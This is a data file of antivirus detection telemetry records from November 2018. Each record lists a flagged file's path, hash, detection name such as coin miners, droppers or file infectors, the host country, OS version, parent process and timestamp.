  Row(detection=Row(filename='tmp001f8788', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8788', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230745-988af186', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_62967912\\AVSCAN-20181104-224358-67F8C2A6\\AVSCAN-20181104-230745-988AF186', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D02CF1F559CFB2B7AA152BED46699C2EA76D378F03C14D04432C486E01B76C35', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:49:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221223-65c7bd82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221223-65C7BD82', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:12:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180254-e390ec26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01911de9\\AVSCAN-20181104-174801-3DA6A564\\AVSCAN-20181104-180254-E390EC26', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='31cf89fc6413a2e5ba20a000e799080b1401607028c82df0d418a6b0c4ded667', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:02:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212152-4385196c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212152-4385196C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212431-60464a72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212431-60464A72', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:24:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103201-5763304e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-103131-53CE8643\\AVSCAN-20181104-103201-5763304E', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:32:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\save\\Neuer Ordner\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='78d09462c04f5750efc0ce85619ec94ae431af9ae2cc79596f9b048fec90eae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EditMDor1US2cMTk.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T08:46:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fosco 2017.exe', filepath='G:\\FOSCO 2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221503-8299849b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221503-8299849B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:15:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Autodesk\\3ds Max 2014\\3dsmax.exe', parentsize=11053896, timestamp='2018-11-04T16:20:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D4401A19084AD558C5D1657C1C36FC5C1E5152AF3E9BD2A9F0425207FB58849E', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='d4401a19084ad558c5d1657c1c36fc5c1e5152af3e9bd2a9f0425207fb58849e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:35:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\T:\\IN\\Ultimate Keygen Collection + New Cracks\\Ultimate Keygen Collection\\MediaMonkey Gold v2 5 5 988 Incl Keymaker-CORE\\keygen.exe', filesize=128000, name='SPR/Tool.Keygen.4743.#M1.#R1'), hash='e6af40ffe3c67a280d53c526688c7990590f6b2a763ab626acc2c0918a9c740a', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091539-b5afe00c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc8bb42a\\AVSCAN-20181102-091526-B31E22A5\\AVSCAN-20181102-091539-B5AFE00C', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='cb0662850abb074dbdf2c7eb89152a9256149dff075aeffa274a6b99a9cded1e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-02T18:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiql.exe', filepath='\\\\?\\C:\\ProgramData\\msiql.exe', filesize=1920000, name='HEUR/AGEN.1027953.#M1.#R1'), hash='90344389f8755d99916fd079cef7e23e7f913126c777a1ff58a52e534bb76a17', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hotel.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\HOTEL\\HOTEL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-DOWNLOADCORES', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T09:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nss9C09.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T04:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='harrier.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\HARRIER\\HARRIER.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b5798e22548fa0c0a971f2c3386c37e76c7327a5183521d63b2ab53abe7795c4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xwxcigfcfhr.exe', filepath='c:\\users\\X\\appdata\\roaming\\xwxcigfcfhr.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T20:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075902-8474a813', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-075902-8474A813', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:27:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-021901-532fdd20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47371313\\AVSCAN-20181103-021459-38783B30\\AVSCAN-20181103-021901-532FDD20', filesize=92000, name='HEUR/AGEN.1007429.#M1.#R1'), hash='e75837394b3dfb3f3f727d13f77948e0d27fc9e621242ea910b518b2561ae517', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:19:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105514-5efb308d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105514-5EFB308D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uckqbcbs.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\uCKQBcbs.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a75634b8d79e8e2e610ab065000986efe474926bdfd12d657f507239610589a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A75634B8D79E8E2E610AB065000986EFE474926BDFD12D657F507239610589A4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a75634b8d79e8e2e610ab065000986efe474926bdfd12d657f507239610589a4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214626-21a3bc8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-214345-0A3DF285\\AVSCAN-20181102-214626-21A3BC8D', filesize=1268000, name='TR/Decep.IObit.EN.#M1.#R1'), hash='edc30c30be7b2a18716ee90d8954541b53f3074a74648754f633cbe877554579', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:46:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D6CF7BBFFDB8C4385F9B37E103D662945DF3270F211C4510FD378400863C24E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172604-6502243c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5898a29\\AVSCAN-20181101-173653-C48861B1\\AVSCAN-20181102-172604-6502243C', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='91c526433733fada7b463e1737c5711327ba69d7dd6b3feb82574b0713c96b5e', metadata=Row(cmdline=None, country='EE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0yg3pndpr5x\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='F:\\autorun.inf\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D6CF7BBFFDB8C4385F9B37E103D662945DF3270F211C4510FD378400863C24E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8d6cf7bbffdb8c4385f9b37e103d662945df3270f211c4510fd378400863c24e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ct0vhfduu21\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/increment', country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-02T14:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Users\\X\\Desktop\\Volcano Box [FULL.CRACK.SETUP+LOADER+PATCHED]\\Volcano Tool v2.29 2013-09-02\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='c56bb70cf81c8d390224ce18b3bebe32ed06e1297ea6b30a04e07b2285c27de3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MLmH4qVo\\\\\\/EinJC7D.1', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1061f5b34b7b3f88bd7b347445ee9bc4', filepath='e:\\sample\\20181102_sample\\1061F5B34B7B3F88BD7B347445EE9BC4', filesize=960000, name='TR/Dropper.VB.8b2d71.#M1.#R1'), hash='8b2d71281a293ebf87d0053ecd317cdfd2e47d581835d8d2722aae71c9698330', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:23:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\DisableUSBWin7.exe', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205211-268ca1fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-205211-268CA1FA', filesize=1056000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='b12b35f4f36cf6350b6211411529eedad120eb8b56e60c74a0a77b57c508f375', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:52:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f2522a4e8d7e1f0554f0d7a8a6420b78a1aaf0543838282afb2a55d3a5d9b3f3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='G:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M2.#R5505'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023a31f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a31f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:55:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291ff6', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291ff6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:17Z'), dt=datetime.date(2018, 11, 4)),
